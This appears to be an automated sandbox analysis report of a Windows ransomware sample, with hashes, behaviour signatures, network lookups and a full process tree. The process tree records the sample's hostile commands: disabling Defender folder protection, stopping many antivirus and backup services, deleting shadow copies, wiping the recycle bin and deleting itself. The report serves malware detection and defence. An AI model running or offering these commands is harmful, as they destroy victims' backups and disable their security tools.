Analysis

  • max time kernel
    16s
  • max time network
    16s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    14-12-2024 09:32

General

  • Target

    5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe

  • Size

    91KB

  • MD5

    be60e389a0108b2871dff12dfbb542ac

  • SHA1

    14b4e0bfac64ec0f837f84ab1780ca7ced8d670d

  • SHA256

    5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d

  • SHA512

    6051bec441434a80c34ee2752a3da9c3a0307cd1b551aa27a0f7f6f75b9bf64b172745d80f03eea054a03ebd2c493df21fd48d8fa3b706d46a6f7fee0e7c0641

  • SSDEEP

    1536:QguHLgeS6umiCp31W4qYXgsLlOqrgB9GpF7LXdarTkCAKL5dsluhtvM4CoLT6QPg:D6seqCp31Hgsp9a9GTrda8CAKLTsWkyI

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Renames multiple (64) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Interacts with shadow copies 3 TTPs 14 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 3 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
    "C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe"
    1⤵
    • Drops startup file
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2508
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:2736
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop avpsus /y
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2836
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop avpsus /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3040
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop McAfeeDLPAgentService /y
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2868
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2940
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop mfewc /y
      2⤵
        PID:2760
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop mfewc /y
          3⤵
            PID:2152
        • C:\Windows\SysWOW64\net.exe
          "net.exe" stop BMR Boot Service /y
          2⤵
            PID:2732
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop BMR Boot Service /y
              3⤵
              • System Location Discovery: System Language Discovery
              PID:3132
          • C:\Windows\SysWOW64\net.exe
            "net.exe" stop NetBackup BMR MTFTP Service /y
            2⤵
            • System Location Discovery: System Language Discovery
            PID:2972
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
              3⤵
                PID:940
            • C:\Windows\SysWOW64\net.exe
              "net.exe" stop DefWatch /y
              2⤵
              • System Location Discovery: System Language Discovery
              PID:2740
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop DefWatch /y
                3⤵
                • System Location Discovery: System Language Discovery
                PID:1100
            • C:\Windows\SysWOW64\net.exe
              "net.exe" stop ccEvtMgr /y
              2⤵
              • System Location Discovery: System Language Discovery
              PID:2804
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop ccEvtMgr /y
                3⤵
                • System Location Discovery: System Language Discovery
                PID:1252
            • C:\Windows\SysWOW64\net.exe
              "net.exe" stop ccSetMgr /y
              2⤵
                PID:2968
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop ccSetMgr /y
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:2380
              • C:\Windows\SysWOW64\net.exe
                "net.exe" stop SavRoam /y
                2⤵
                • System Location Discovery: System Language Discovery
                PID:2808
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop SavRoam /y
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:1512
              • C:\Windows\SysWOW64\net.exe
                "net.exe" stop RTVscan /y
                2⤵
                • System Location Discovery: System Language Discovery
                PID:2768
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop RTVscan /y
                  3⤵
                    PID:2428
                • C:\Windows\SysWOW64\net.exe
                  "net.exe" stop QBFCService /y
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:1044
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop QBFCService /y
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:1092
                • C:\Windows\SysWOW64\net.exe
                  "net.exe" stop QBIDPService /y
                  2⤵
                    PID:2816
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop QBIDPService /y
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:1812
                  • C:\Windows\SysWOW64\net.exe
                    "net.exe" stop Intuit.QuickBooks.FCS /y
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:2744
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
                      3⤵
                        PID:2392
                    • C:\Windows\SysWOW64\net.exe
                      "net.exe" stop QBCFMonitorService /y
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:2776
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop QBCFMonitorService /y
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:1972
                    • C:\Windows\SysWOW64\net.exe
                      "net.exe" stop YooBackup /y
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:2660
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop YooBackup /y
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:1924
                    • C:\Windows\SysWOW64\net.exe
                      "net.exe" stop YooIT /y
                      2⤵
                        PID:2884
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop YooIT /y
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:1760
                      • C:\Windows\SysWOW64\net.exe
                        "net.exe" stop zhudongfangyu /y
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:2600
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop zhudongfangyu /y
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:2832
                      • C:\Windows\SysWOW64\net.exe
                        "net.exe" stop stc_raw_agent /y
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:2596
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop stc_raw_agent /y
                          3⤵
                            PID:2560
                        • C:\Windows\SysWOW64\net.exe
                          "net.exe" stop VSNAPVSS /y
                          2⤵
                            PID:2620
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop VSNAPVSS /y
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:2140
                          • C:\Windows\SysWOW64\net.exe
                            "net.exe" stop VeeamTransportSvc /y
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:2648
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop VeeamTransportSvc /y
                              3⤵
                                PID:1008
                            • C:\Windows\SysWOW64\net.exe
                              "net.exe" stop VeeamDeploymentService /y
                              2⤵
                              • System Location Discovery: System Language Discovery
                              PID:2652
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop VeeamDeploymentService /y
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:1692
                            • C:\Windows\SysWOW64\net.exe
                              "net.exe" stop VeeamNFSSvc /y
                              2⤵
                                PID:2676
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop VeeamNFSSvc /y
                                  3⤵
                                    PID:2396
                                • C:\Windows\SysWOW64\net.exe
                                  "net.exe" stop veeam /y
                                  2⤵
                                    PID:2108
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop veeam /y
                                      3⤵
                                        PID:2468
                                    • C:\Windows\SysWOW64\net.exe
                                      "net.exe" stop PDVFSService /y
                                      2⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3056
                                      • C:\Windows\SysWOW64\net1.exe
                                        C:\Windows\system32\net1 stop PDVFSService /y
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:3092
                                    • C:\Windows\SysWOW64\net.exe
                                      "net.exe" stop BackupExecVSSProvider /y
                                      2⤵
                                        PID:1764
                                        • C:\Windows\SysWOW64\net1.exe
                                          C:\Windows\system32\net1 stop BackupExecVSSProvider /y
                                          3⤵
                                            PID:1080
                                        • C:\Windows\SysWOW64\net.exe
                                          "net.exe" stop BackupExecAgentAccelerator /y
                                          2⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:2944
                                          • C:\Windows\SysWOW64\net1.exe
                                            C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
                                            3⤵
                                              PID:1756
                                          • C:\Windows\SysWOW64\net.exe
                                            "net.exe" stop BackupExecAgentBrowser /y
                                            2⤵
                                              PID:1680
                                              • C:\Windows\SysWOW64\net1.exe
                                                C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
                                                3⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:2964
                                            • C:\Windows\SysWOW64\net.exe
                                              "net.exe" stop BackupExecDiveciMediaService /y
                                              2⤵
                                                PID:2700
                                                • C:\Windows\SysWOW64\net1.exe
                                                  C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
                                                  3⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1744
                                              • C:\Windows\SysWOW64\net.exe
                                                "net.exe" stop BackupExecJobEngine /y
                                                2⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:1816
                                                • C:\Windows\SysWOW64\net1.exe
                                                  C:\Windows\system32\net1 stop BackupExecJobEngine /y
                                                  3⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2800
                                              • C:\Windows\SysWOW64\net.exe
                                                "net.exe" stop BackupExecManagementService /y
                                                2⤵
                                                  PID:1688
                                                  • C:\Windows\SysWOW64\net1.exe
                                                    C:\Windows\system32\net1 stop BackupExecManagementService /y
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2536
                                                • C:\Windows\SysWOW64\net.exe
                                                  "net.exe" stop BackupExecRPCService /y
                                                  2⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1996
                                                  • C:\Windows\SysWOW64\net1.exe
                                                    C:\Windows\system32\net1 stop BackupExecRPCService /y
                                                    3⤵
                                                      PID:1808
                                                  • C:\Windows\SysWOW64\net.exe
                                                    "net.exe" stop AcrSch2Svc /y
                                                    2⤵
                                                      PID:2848
                                                      • C:\Windows\SysWOW64\net1.exe
                                                        C:\Windows\system32\net1 stop AcrSch2Svc /y
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:2012
                                                    • C:\Windows\SysWOW64\net.exe
                                                      "net.exe" stop AcronisAgent /y
                                                      2⤵
                                                        PID:936
                                                        • C:\Windows\SysWOW64\net1.exe
                                                          C:\Windows\system32\net1 stop AcronisAgent /y
                                                          3⤵
                                                            PID:748
                                                        • C:\Windows\SysWOW64\net.exe
                                                          "net.exe" stop CASAD2DWebSvc /y
                                                          2⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:820
                                                          • C:\Windows\SysWOW64\net1.exe
                                                            C:\Windows\system32\net1 stop CASAD2DWebSvc /y
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:1604
                                                        • C:\Windows\SysWOW64\net.exe
                                                          "net.exe" stop CAARCUpdateSvc /y
                                                          2⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:2796
                                                          • C:\Windows\SysWOW64\net1.exe
                                                            C:\Windows\system32\net1 stop CAARCUpdateSvc /y
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:3156
                                                        • C:\Windows\SysWOW64\net.exe
                                                          "net.exe" stop sophos /y
                                                          2⤵
                                                            PID:592
                                                            • C:\Windows\SysWOW64\net1.exe
                                                              C:\Windows\system32\net1 stop sophos /y
                                                              3⤵
                                                                PID:3148
                                                            • C:\Windows\SysWOW64\sc.exe
                                                              "sc.exe" config SQLTELEMETRY start= disabled
                                                              2⤵
                                                              • Launches sc.exe
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2484
                                                            • C:\Windows\SysWOW64\sc.exe
                                                              "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
                                                              2⤵
                                                              • Launches sc.exe
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2072
                                                            • C:\Windows\SysWOW64\sc.exe
                                                              "sc.exe" config SQLWriter start= disabled
                                                              2⤵
                                                              • Launches sc.exe
                                                              PID:2296
                                                            • C:\Windows\SysWOW64\sc.exe
                                                              "sc.exe" config SstpSvc start= disabled
                                                              2⤵
                                                              • Launches sc.exe
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2144
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              "taskkill.exe" /IM mspub.exe /F
                                                              2⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Kills process with taskkill
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2388
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              "taskkill.exe" /IM mydesktopqos.exe /F
                                                              2⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Kills process with taskkill
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2076
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              "taskkill.exe" /IM mydesktopservice.exe /F
                                                              2⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Kills process with taskkill
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2212
                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                              "vssadmin.exe" Delete Shadows /all /quiet
                                                              2⤵
                                                              • Interacts with shadow copies
                                                              PID:1956
                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                              "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
                                                              2⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Interacts with shadow copies
                                                              PID:1880
                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                              "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
                                                              2⤵
                                                              • Interacts with shadow copies
                                                              PID:2208
                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                              "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
                                                              2⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Interacts with shadow copies
                                                              PID:2256
                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                              "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
                                                              2⤵
                                                              • Interacts with shadow copies
                                                              PID:2272
                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                              "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
                                                              2⤵
                                                              • Interacts with shadow copies
                                                              PID:2192
                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                              "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
                                                              2⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Interacts with shadow copies
                                                              PID:1628
                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                              "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
                                                              2⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Interacts with shadow copies
                                                              PID:3008
                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                              "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
                                                              2⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Interacts with shadow copies
                                                              PID:628
                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                              "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
                                                              2⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Interacts with shadow copies
                                                              PID:324
                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                              "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
                                                              2⤵
                                                              • Interacts with shadow copies
                                                              PID:1800
                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                              "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
                                                              2⤵
                                                              • Interacts with shadow copies
                                                              PID:2492
                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                              "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
                                                              2⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Interacts with shadow copies
                                                              PID:884
                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                              "vssadmin.exe" Delete Shadows /all /quiet
                                                              2⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Interacts with shadow copies
                                                              PID:1088
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
                                                              2⤵
                                                                PID:1540
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpB8D4.bat
                                                                2⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:3384
                                                              • C:\Windows\SysWOW64\notepad.exe
                                                                "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
                                                                2⤵
                                                                • Opens file in notepad (likely ransom note)
                                                                PID:1920
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
                                                                2⤵
                                                                • System Location Discovery: System Language Discovery
                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                PID:3120
                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                  ping 127.0.0.7 -n 3
                                                                  3⤵
                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                  • Runs ping.exe
                                                                  PID:3296
                                                                • C:\Windows\SysWOW64\fsutil.exe
                                                                  fsutil file setZeroData offset=0 length=524288 “%s”
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2472
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                                2⤵
                                                                • Deletes itself
                                                                PID:3260
                                                                • C:\Windows\SysWOW64\choice.exe
                                                                  choice /C Y /N /D Y /T 3
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2152

                                                            Network

                                                            • flag-us
                                                              DNS
                                                              www.google.com
                                                              5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                              Remote address:
                                                              8.8.8.8:53
                                                              Request
                                                              www.google.com
                                                              IN A
                                                              Response
                                                              www.google.com
                                                              IN A
                                                              172.217.20.164
                                                            • flag-us
                                                              DNS
                                                              raw.githubusercontent.com
                                                              5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                              Remote address:
                                                              8.8.8.8:53
                                                              Request
                                                              raw.githubusercontent.com
                                                              IN A
                                                              Response
                                                              raw.githubusercontent.com
                                                              IN A
                                                              185.199.109.133
                                                              raw.githubusercontent.com
                                                              IN A
                                                              185.199.110.133
                                                              raw.githubusercontent.com
                                                              IN A
                                                              185.199.108.133
                                                              raw.githubusercontent.com
                                                              IN A
                                                              185.199.111.133
                                                            • flag-fr
                                                              GET
                                                              https://www.google.com/
                                                              5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                              Remote address:
                                                              172.217.20.164:443
                                                              Request
                                                              GET / HTTP/1.1
                                                              Host: www.google.com
                                                              Connection: Keep-Alive
                                                              Response
                                                              HTTP/1.1 302 Found
                                                              Location: https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS117BTGL6h9boGIjBhD4AsU-MkuqdAtpjmCOPi31BrDIIx92c8fgH1mho6lQBmTBbgzYaHOoDBWdxkHioyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                              x-hallmonitor-challenge: CgsIv6H1ugYQgoLOcRIEtdewUw
                                                              Content-Type: text/html; charset=UTF-8
                                                              Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-MPPMBAoElj2LhQtJaQKyZg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                              Date: Sat, 14 Dec 2024 09:32:47 GMT
                                                              Server: gws
                                                              Content-Length: 398
                                                              X-XSS-Protection: 0
                                                              X-Frame-Options: SAMEORIGIN
                                                              Set-Cookie: AEC=AZ6Zc-VOgrBE0GEgvwR4QImIH-kA1PGUkkFMs5IqdLRz3BXg47BCOyR1Pg; expires=Thu, 12-Jun-2025 09:32:47 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                              Set-Cookie: __Secure-ENID=24.SE=BKNlNZ7vs4uiP5AOxulecExQJvZtaT7oWAFNKnM8XIWC8i7DDMypEdJGol3DySVfCJ9lIISYnR6iy9aaVOVKPrSNIgB_A4BH3EvJgKN12EhLirq0kCBMA5AcrdWEij6QxI9c1td2y2lylhOQfDP9ILv-mNBDpvAwbJumUJC2XMjxjMWykEgsvJoMTtzsBSPUQE3b3y8c; expires=Wed, 14-Jan-2026 01:51:04 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            • flag-fr
                                                              GET
                                                              https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS117BTGL6h9boGIjBhD4AsU-MkuqdAtpjmCOPi31BrDIIx92c8fgH1mho6lQBmTBbgzYaHOoDBWdxkHioyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                              5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                              Remote address:
                                                              172.217.20.164:443
                                                              Request
                                                              GET /sorry/index?continue=https://www.google.com/&q=EgS117BTGL6h9boGIjBhD4AsU-MkuqdAtpjmCOPi31BrDIIx92c8fgH1mho6lQBmTBbgzYaHOoDBWdxkHioyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                              Host: www.google.com
                                                              Response
                                                              HTTP/1.1 429 Too Many Requests
                                                              Date: Sat, 14 Dec 2024 09:32:47 GMT
                                                              Pragma: no-cache
                                                              Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Content-Type: text/html
                                                              Server: HTTP server (unknown)
                                                              Content-Length: 3078
                                                              X-XSS-Protection: 0
                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            • 172.217.20.164:443
                                                              https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS117BTGL6h9boGIjBhD4AsU-MkuqdAtpjmCOPi31BrDIIx92c8fgH1mho6lQBmTBbgzYaHOoDBWdxkHioyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                              tls, http
                                                              5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                              1.1kB
                                                              10.0kB
                                                              11
                                                              14

                                                              HTTP Request

                                                              GET https://www.google.com/

                                                              HTTP Response

                                                              302

                                                              HTTP Request

                                                              GET https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS117BTGL6h9boGIjBhD4AsU-MkuqdAtpjmCOPi31BrDIIx92c8fgH1mho6lQBmTBbgzYaHOoDBWdxkHioyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

                                                              HTTP Response

                                                              429
                                                            • 185.199.109.133:443
                                                              raw.githubusercontent.com
                                                              tls
                                                              5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                              359 B
                                                              219 B
                                                              5
                                                              5
                                                            • 8.8.8.8:53
                                                              www.google.com
                                                              dns
                                                              5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                              60 B
                                                              76 B
                                                              1
                                                              1

                                                              DNS Request

                                                              www.google.com

                                                              DNS Response

                                                              172.217.20.164

                                                            • 8.8.8.8:53
                                                              raw.githubusercontent.com
                                                              dns
                                                              5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                              71 B
                                                              135 B
                                                              1
                                                              1

                                                              DNS Request

                                                              raw.githubusercontent.com

                                                              DNS Response

                                                              185.199.109.133
                                                              185.199.110.133
                                                              185.199.108.133
                                                              185.199.111.133

                                                            MITRE ATT&CK Enterprise v15

                                                            Replay Monitor

                                                            Loading Replay Monitor...

                                                            Downloads

                                                            • C:\HOW_TO_DECYPHER_FILES.txt

                                                              Filesize

                                                              1KB

                                                              MD5

                                                              7ca69eac5cd42ef8d58d1078e64e1df9

                                                              SHA1

                                                              53b63384f9c2b74fea41b97187c69e2a5cfc985a

                                                              SHA256

                                                              904571e7b01a1508e3f69aec06a49c71c8a6423a109503145869921c5685a60b

                                                              SHA512

                                                              6ab9965548b6c166a2e1052e2d1755f1dc021d91a4494041ce92e5777537a15e741280a328f883eec644d9d500dd1bc2aa16a3fcb06c973d9cb4fc2670540bbb

                                                            • memory/2508-0-0x00000000749EE000-0x00000000749EF000-memory.dmp

                                                              Filesize

                                                              4KB

                                                            • memory/2508-1-0x00000000009B0000-0x00000000009CC000-memory.dmp

                                                              Filesize

                                                              112KB

                                                            • memory/2508-2-0x00000000749E0000-0x00000000750CE000-memory.dmp

                                                              Filesize

                                                              6.9MB

                                                            • memory/2508-106-0x00000000749E0000-0x00000000750CE000-memory.dmp

                                                              Filesize

                                                              6.9MB

                                                            We care about your privacy.

                                                            This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.